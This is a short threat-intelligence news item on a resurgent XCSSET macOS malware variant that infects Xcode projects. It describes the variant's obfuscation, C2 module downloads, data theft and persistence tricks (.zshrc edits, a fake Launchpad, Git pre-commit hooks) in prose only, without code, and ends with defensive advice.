Threat Intelligence has identified a new variant of the XCSSET macOS malware, marking its first known resurgence since 2022. This sophisticated malware targets developers by infecting Xcode projects, allowing it to execute malicious payloads when the project is built. The updated variant features enhanced obfuscation, advanced persistence techniques, and new infection methods aimed at stealing sensitive information. By leveraging shared project files among macOS developers, XCSSET spreads stealthily, making detection challenging. It employs scripting languages, UNIX commands, and legitimate macOS binaries to remain fileless and avoid detection while executing its malicious operations.

According to the Researchers, the malware’s modular architecture includes heavily encoded payloads, improved error handling, and randomized code generation techniques to evade static analysis. Unlike earlier versions that relied solely on xxd (hexdump) for encoding, the latest variant incorporates Base64 encoding. The infection process consists of four stages, beginning with an obfuscated shell payload that is executed when a compromised Xcode project is built. This payload undergoes multiple layers of hex decoding before execution, ultimately leading to the download of additional modules from a command-and-control (C2) server. These modules are designed to extract system information, browser extension data, digital wallets, and notes stored on infected macOS devices.

XCSSET achieves persistence through multiple methods, ensuring the malware remains active even after reboots. One technique involves modifying the ~/.zshrc file to execute malicious code whenever a new shell session starts. Another method creates a fake Launchpad application that launches the malware when the user tries to open the legitimate Launchpad. Additionally, XCSSET targets Git repositories by modifying pre-commit hooks to execute its payload whenever a developer commits changes. These persistence strategies demonstrate the malware’s adaptability and ability to blend into regular macOS operations, further complicating detection and removal.

Microsoft advises macOS users, particularly developers, to implement strict security measures, including keeping their systems up to date, thoroughly inspecting Xcode projects for anomalies, and using security solutions like Microsoft Defender for Endpoint on Mac. These precautions can help identify and mitigate threats posed by XCSSET and similar malware. As this variant continues to evolve, proactive monitoring and security awareness remain critical in defending against these sophisticated attacks.